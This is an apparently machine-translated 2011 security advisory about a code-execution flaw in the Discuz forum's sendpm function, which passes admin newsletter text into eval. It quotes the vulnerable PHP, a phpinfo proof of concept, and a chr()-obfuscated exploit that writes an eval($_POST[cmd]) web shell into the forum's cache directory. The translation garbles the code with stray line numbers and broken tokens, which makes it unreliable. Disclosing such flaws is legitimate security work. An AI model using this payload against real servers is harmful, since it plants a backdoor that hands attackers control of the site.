Discuz non-founder administrator code execution-vulnerability warning-the black bar safety net

2011-01-11T00:00:00
ID MYHACK58:62201128819
Type myhack58
Reporter 佚名
Modified 2011-01-11T00:00:00

Description

|

by:alibaba

global.func.php function sendpm($toid, $subject, $message, $fromid = ") { 0 2 if($fromid === ") { 0 3 require_once DISCUZ_ROOT.'./ uc_client/client.php'; 0 4 $fromid = $discuz_uid; 0 5 } 0 6 if($fromid) { 0 7 uc_pm_send($fromid, $toid, $subject, $message); 0 8 } else { 0 9 global $promptkeys; 1 0 if(in_array($subject, $promptkeys)) { 1 1 $type = $subject; 1 2 } else { 1 3 extract($GLOBALS, EXTR_SKIP); 1 4 require_once DISCUZ_ROOT.'./ include/discuzcode.func.php'; 1 5 eval("\$message = addslashes(\"".$ message."\");"); //No filter can be inserted into the code 1 6 $type = 'systempm'; 1 7 $message = '<div>'.$ the subject.' {time}'. discuzcode($message, 1, 0).'& lt;/div>'; 1 8 } 1 9 sendnotice($toid, $message, $type); 2 0 } 2 1 }

POC: 1. The admincp. php? frames=yes&action=members&operation=newsletter 2. Send a short message, the notification content is: {${phpinfo()}} EXP - (fputs(fopen('forumdata/cache/cache_01.php','w'),'<? php eval($_POST[cmd])?& gt;');) : ${${eval(chr(1 0 2). chr(1 1 2). chr(1 1 7). chr(1 1 6). chr(1 1 5). chr(4 0). chr(1 0 2). chr(1 1 1). chr(1 1 2). chr(1 0 1). chr(1 1 0). chr(4 0). chr(3 9). chr(1 0 2). chr(1 1 1). chr(1 1 4). chr(1 1 7). chr(1 0 9). chr(1 0 0). chr(9 7). chr(1 1 6). chr(9 7). chr(4 7). chr(9 9). chr(9 7). chr(9 9). chr(1 0 4). chr(1 0 1). chr(4 7). chr(9 9). chr(9 7). chr(9 9). chr(1 0 4). chr(1 0 1). chr(9 5). chr(4 8). chr(4 9). chr(4 6). chr(1 1 2). chr(1 0 4). chr(1 1 2). chr(3 9). chr(4 4). chr(3 9). chr(1 1 9). chr(3 9). chr(4 1). chr(4 4). chr(3 9). chr(6 0). chr(6 3). chr(1 1 2). chr(1 0 4). chr(1 1 2). chr(3 2). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 0). chr(3 6). chr(9 5). chr(8 0). chr(7 9). chr(8 3). chr(8 4). chr(9 1). chr(9 9). chr(1 0 9). chr(1 0 0). chr(9 3). chr(4 1). chr(6 3). chr(6 2). chr(3 9). chr(4 1). chr(5 9))}}